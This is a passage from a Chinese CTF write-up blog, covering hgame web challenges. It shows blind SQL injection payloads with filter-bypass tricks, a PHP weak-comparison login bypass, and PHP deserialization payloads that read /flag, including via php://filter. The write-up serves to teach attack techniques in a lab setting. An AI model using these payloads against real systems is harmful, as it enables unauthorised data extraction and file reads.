flag</span><br><span class="line"></span><br><span class="line">print flag</span><br><span class="line"></span><br><span class="line"># 404^if(length(database())&gt;50,1,0)^1</span><br><span class="line"># 404^if(ascii(substr(database(),1,1))&gt;64,1,0)^1</span><br><span class="line"># pokemon</span><br><span class="line"></span><br><span class="line"># 404^if((selselectect/*/**/*/length(group_concat(table_name))/*/**/*/frfromom/*/**/*/infoorrmation_schema.tables/*/**/*/whewherere/*/**/*/table_schema/*/**/*/like/*/**/*/database())&gt;50,1,0)^1</span><br><span class="line"># 404^if(ascii(substr((selselectect/*/**/*/group_concat(table_name)/*/**/*/frfromom/*/**/*/infoorrmation_schema.tables/*/**/*/whewherere/*/**/*/table_schema/*/**/*/like/*/**/*/database()),23,1))&lt;103,1,0)^1</span><br><span class="line"># errors,fllllllllaaaaaag</span><br><span class="line"></span><br><span class="line"># 404^if((selselectect/*/**/*/length(group_concat(column_name))/*/**/*/frfromom/*/**/*/infoorrmation_schema.columns/*/**/*/whewherere/*/**/*/table_name/*/**/*/like/*/**/*/&apos;fllllllllaaaaaag&apos;)&gt;50,1,0)^1</span><br><span class="line"># 404^if(ascii(substr((selselectect/*/**/*/group_concat(column_name)/*/**/*/frfromom/*/**/*/infoorrmation_schema.columns/*/**/*/whewherere/*/**/*/table_name/*/**/*/like/*/**/*/&apos;fllllllllaaaaaag&apos;),4,1))&lt;103,1,0)^1</span><br><span class="line"># flag</span><br><span class="line"></span><br><span class="line"># 404^if((selselectect/*/**/*/length(group_concat(flag))/*/**/*/frfromom/*/**/*/fllllllllaaaaaag)&gt;50,1,0)^1</span><br><span class="line"># 404^if(ascii(substr((selselectect/*/**/*/group_concat(flag)/*/**/*/frfromom/*/**/*/fllllllllaaaaaag),41,1))&lt;125,1,0)^1</span><br><span class="line"># hgame&#123;C0n9r@tul4tiOn*Y0u$4r3_sq1_M4ST3R#&#125;</span><br></pre></td></tr></table></figure>
<h2 id="一本单词书"><a href="#一本单词书" class="headerlink" title="一本单词书"></a>一本单词书</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">if ($_SERVER[&apos;REQUEST_METHOD&apos;] == &apos;POST&apos;) &#123;</span><br><span class="line">    if (!isset($_POST[&apos;username&apos;]) || !isset($_POST[&apos;password&apos;])) &#123;</span><br><span class="line">        return;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    if ($_POST[&apos;username&apos;] != &apos;adm1n&apos;) &#123;</span><br><span class="line">        die(alert(&apos;username or password is invalid&apos;));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    if (is_numeric($_POST[&apos;password&apos;])) &#123;</span><br><span class="line">        die(alert(&apos;密码不能设置为纯数字，我妈都知道(￣△￣；)&apos;));</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        if ($_POST[&apos;password&apos;] == 1080) &#123;</span><br><span class="line">            $_SESSION[&apos;username&apos;] = &apos;admin&apos;;</span><br><span class="line">            $_SESSION[&apos;unique_key&apos;] = md5(randomString(8));</span><br><span class="line">            header(&apos;Location: index.php&apos;);</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            die(alert(&apos;这你都能输错？&apos;));</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>登录验证，弱类型比较可绕过</p>
<p><code>index.php</code>中可以看到，储存时使用<code>save.php</code>，获得时使用<code>get.php</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">function encode($data): string &#123;</span><br><span class="line">    $result = &apos;&apos;;</span><br><span class="line">    foreach ($data as $k =&gt; $v) &#123;</span><br><span class="line">        $result .= $k . &apos;|&apos; . serialize($v);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    return $result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以看到储存时，json数据被解析为数组后，会被处理为<code>key|val</code>的形式，<code>val</code>被进行了序列化</p>
<p>在<code>get.php</code>中可以对取出的储存数据的处理<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">function decode(string $data): Array &#123;</span><br><span class="line">    $result = [];</span><br><span class="line">    $offset = 0;</span><br><span class="line">    $length = \strlen($data);</span><br><span class="line">    while ($offset &lt; $length) &#123;</span><br><span class="line">        if (!strstr(substr($data, $offset), &apos;|&apos;)) &#123;</span><br><span class="line">            return [];</span><br><span class="line">        &#125;</span><br><span class="line">        $pos = strpos($data, &apos;|&apos;, $offset);</span><br><span class="line">        $num = $pos - $offset;</span><br><span class="line">        $varname = substr($data, $offset, $num);</span><br><span class="line">        $offset += $num + 1;</span><br><span class="line">        $dataItem = unserialize(substr($data, $offset));</span><br><span class="line"></span><br><span class="line">        $result[$varname] = $dataItem;</span><br><span class="line">        $offset += \strlen(serialize($dataItem));</span><br><span class="line">    &#125;</span><br><span class="line">    return $result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>可以看到<code>offset</code>初始为0，然后<code>pos</code>先获得第一个<code>|</code>的位置，<code>num</code>是<code>pos</code>与<code>offset</code>的差。<code>varname</code>则是<code>|</code>前面的字符串，即<code>key</code>。<code>dataItem</code>则是<code>val</code>，接着将键值对放入<code>result</code>中，最后<code>offest</code>指向第一个键值对结束的位置。最终通过循环所有的储存数据都被放入到<code>result</code>中<br>这里可以利用对<code>|</code>位置的判断，在<code>key</code>的值中设置<code>|</code>和要反序列化的数据，在<code>encode()</code>中<code>key</code>不会被序列化，通过这样就能绕过对<code>val</code>的序列化</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">class Evil &#123;</span><br><span class="line">    public $file;</span><br><span class="line">    public $flag;</span><br><span class="line"></span><br><span class="line">    public function __wakeup() &#123;</span><br><span class="line">        $content = file_get_contents($this-&gt;file);</span><br><span class="line">        if (preg_match(&quot;/hgame/&quot;, $content)) &#123;</span><br><span class="line">            $this-&gt;flag = &apos;hacker!&apos;;</span><br><span class="line">        &#125;</span><br><span class="line">        $this-&gt;flag = $content;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>在<code>eval.php</code>中可以看到读取了属性<code>file</code>，这里写得有些问题，if后没有else也没有return，导致这个if正则判断失去了作用，结果直接把file设置为<code>/flag</code>即可</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">key=xx|O:4:&quot;Evil&quot;:2:&#123;s:4:&quot;file&quot;;s:5:&quot;/flag&quot;;s:4:&quot;flag&quot;;N;&#125;</span><br><span class="line">val=123</span><br></pre></td></tr></table></figure>
<p>即可读取到<code>/flag</code>，就算有正则，用<code>filter</code>来base64读取即可<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">key=xx|O:4:&quot;Evil&quot;:2:&#123;s:4:&quot;file&quot;;s:54:&quot;php://filter/read=convert.base64-encode/recource=/flag&quot;;s:4:&quot;flag&quot;;N;&#125;</span><br><span class="line">val=123</span><br></pre></td></tr></table></figure></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag"># ctf</a>
          
            <a href="/tags/web/" rel="tag"># web</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/12/22/sec21-shen-kaiwen/" rel="next" title="身份验证链上的弱点:针对电子邮件发件人欺骗攻击的大规模分析">
                <i class="fa fa-chevron-left"></i> 身份验证链上的弱点:针对电子邮件发件人欺骗攻击的大规模分析
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="http://shifeng-kaze.cn/blog/head/kotori.jpg" alt="k0t0r1">
            
              <p class="site-author-name" itemprop="name">k0t0r1</p>
              <p class="site-description motion-element" itemprop="description">～いらっしゃいません～</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">29</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://shifeng-kaze.cn/" title="shifeng-kaze" target="_blank">shifeng-kaze</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://aluvion.github.io" title="Aluvion" target="_blank">Aluvion</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Week1"><span class="nav-number">1.</span> <span class="nav-text">Week1</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy-auth"><span class="nav-number">1.1.</span> <span class="nav-text">easy_auth</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#蛛蛛…嘿嘿♥我的蛛蛛"><span class="nav-number">1.2.</span> <span class="nav-text">蛛蛛…嘿嘿♥我的蛛蛛</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Tetris-plus"><span class="nav-number">1.3.</span> <span class="nav-text">Tetris plus</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Fujiwara-Tofu-Shop"><span class="nav-number">1.4.</span> <span class="nav-text">Fujiwara Tofu Shop</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Week2"><span class="nav-number">2.</span> <span class="nav-text">Week2</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Apache"><span class="nav-number">2.1.</span> <span class="nav-text">Apache!</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#webpack-engine"><span class="nav-number">2.2.</span> <span class="nav-text">webpack-engine</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#At0m的留言板"><span class="nav-number">2.3.</span> <span class="nav-text">At0m的留言板</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Pokemon"><span class="nav-number">2.4.</span> <span class="nav-text">Pokemon</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#一本单词书"><span class="nav-number">2.5.</span> <span class="nav-text">一本单词书</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">k0t0r1</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  


  
  <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
  

</body>
</html>
